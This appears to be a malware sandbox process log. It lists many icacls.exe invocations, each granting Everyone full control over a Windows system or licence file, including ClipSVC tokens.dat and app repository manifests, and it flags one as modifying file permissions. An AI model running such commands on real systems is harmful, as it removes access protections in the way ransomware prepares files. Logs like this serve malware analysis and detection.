C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoProvisioning.appx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoProvisioning.appx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoHub.appx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoHub.appx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.BasicAttractLoop.appx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.BasicAttractLoop.appx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Microsoft\Content\Neutral\AppList\AppList.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoMode.bat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoModeJapanese.bat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\LfSvc\Geofence\GeofenceApplicationID.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataCache\dmrc.idx /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\tokens.dat /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\02305155-8ac1-1189-ff55-b7119a53887c.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\03f8974b-362e-33e3-2e0b-c7bc2ea01c63.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\04dc8f1e-f750-388a-f2a5-dc1589650e89.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0890ad2f-b74f-c384-f684-9c33f8f67924.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\09ec127d-8158-a906-c12f-44a86e3e994f.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0a8c1492-65ca-6a01-de25-0e183559d10d.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\13ba8772-845b-29a1-ae9e-fb2793ccf4ea.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1dae14df-4c42-28af-691e-10cc07a990b4.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1e225998-faa0-5fd4-4db7-5e7686ee3b47.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\215f9712-9fca-a3f8-5b11-660eefc73b96.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\26943e1f-42ed-f190-2895-3bc2b8c4176d.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2657f7c0-8294-58c3-f394-15fe18ba174a.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28502d06-9d29-8514-1e5d-64447116d798.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28748306-9f02-a5d7-6ded-4459fddadc31.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2a3adcd0-4ddc-f3d2-6bcb-f11f9cbc1e2c.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3c8c7eb3-7a1d-7981-0472-571cdd1d1292.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3ebdb897-991b-934f-ee13-2ca21ed81938.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3f586f55-284b-e455-06b2-84c84e8d0d2d.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\4c4ecbc0-0ec0-3929-aebb-a931a339fb23.xml /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\517cfcaf-138b-1796-2cea-62892204250a.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\5b0a39aa-16e0-a938-f694-656664c7be15.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\600364a7-e11c-efda-2c12-eac40e75f19a.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\61b5bd89-4cb0-db77-6622-cb63b5a58080.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\630a70e7-1832-4f42-e2a2-5d35fdddc45f.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\67447b0c-05cf-6740-5f7b-391ab440c42d.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\6e90ed81-9187-fa62-ce90-f18d7bed6b12.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71c8f37a-a7b9-aff0-6de0-9b276c089ad6.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71ef3df1-f4b1-69cd-793a-48e165e282aa.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7309084a-bb6f-20c3-ea54-aa108ceab1ae.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7646fa0f-b52c-71a8-3aed-950dd1668c09.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8292682a-6850-c06c-9b6d-9646f16d4ed0.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8ce3d3dd-a4c7-6c38-5fde-1f9f5df98807.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8d56e57b-8663-136d-ff69-a004e217825a.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\865e8f30-20a1-9528-bb48-42999b5b2aa8.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8e383e90-b2f9-7bf2-1d5b-4e47dcb2014e.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\9d3ad23c-c6b8-7fb5-e4ab-f5d0a66dcfbc.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a1e5b165-0532-a6a3-f542-0c5c162be3e1.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a7e08b8b-ad4b-af00-ebcc-1aa29a833ce9.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ac116a72-b6b1-d558-23f6-10796e634d41.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ae09332e-6699-a949-7aff-189c895f83c4.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b34b197c-c0ed-bf12-c9bb-44e883c66a9d.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b81d7e70-84e7-b16a-e3d0-1e7aa2f1232d.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbc7a1c3-44c6-27b6-1e16-487a47263f3e.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbfbe8ad-1a35-a7f3-33bc-40912bf89dfb.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\be39f553-3158-0a39-de0f-8ddf25885daa.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c3d42a1a-2f3f-a4a9-6a04-cc1b234485fb.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c94a6c18-d496-da1c-8a02-fc6976e0145e.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bcda97bb-bfd0-2a72-3c90-c8518f3d09ee.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ca947da2-7e9a-7249-8095-bceb379c6f74.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\cb692946-a9f3-639d-1064-a6d75a01b9c3.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d1ecfce2-f845-c1e9-052b-d2f457c135e6.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d508ba05-d8aa-2836-484d-3833d22fe185.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d90ad1eb-bec3-18c1-8c97-eef683ba6a1f.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e2a686b1-b02a-b3e7-90cb-3fa0d708ce04.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e2a686b1-b02a-b3e7-90cb-3fa0d708ce04.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e335baf1-18ab-73fe-e089-3fa0a6e71a35.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e64ffef1-e246-b632-595b-56076a3fa776.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8ac9388-7c9c-19cc-fd4d-cb72bb1544ea.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ecbc2601-0a67-4963-e594-43c65d6ec9a5.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\f1bb69b5-a7d1-df8f-5820-49f387fd5d2e.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\eee47229-947d-2ac7-e8a3-49bafee251d1.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8fff2df-6041-8f21-3df7-db31661aa09b.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\fc93b452-8a84-dede-3b7a-0fc9413c4592.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\1527c705-839a-4832-9118-54d4Bd6a0c89_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\c5e2524a-ea46-4f67-841f-6a9465d9d515_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\CortanaListenUIApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopLearning_1000.15063.0.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopView_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\E2A4F912-2574-4A75-9BB0-0D023378592B_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\EnvironmentsApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloCamera_1.0.0.5_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloItemPlayerApp_1.0.0.2_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloShell_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\EnvironmentsApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AAD.BrokerPlugin_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AccountsControl_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BioEnrollment_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.CredDialogHost_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.1.25002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.LockApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.2.24002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q2⤵
-
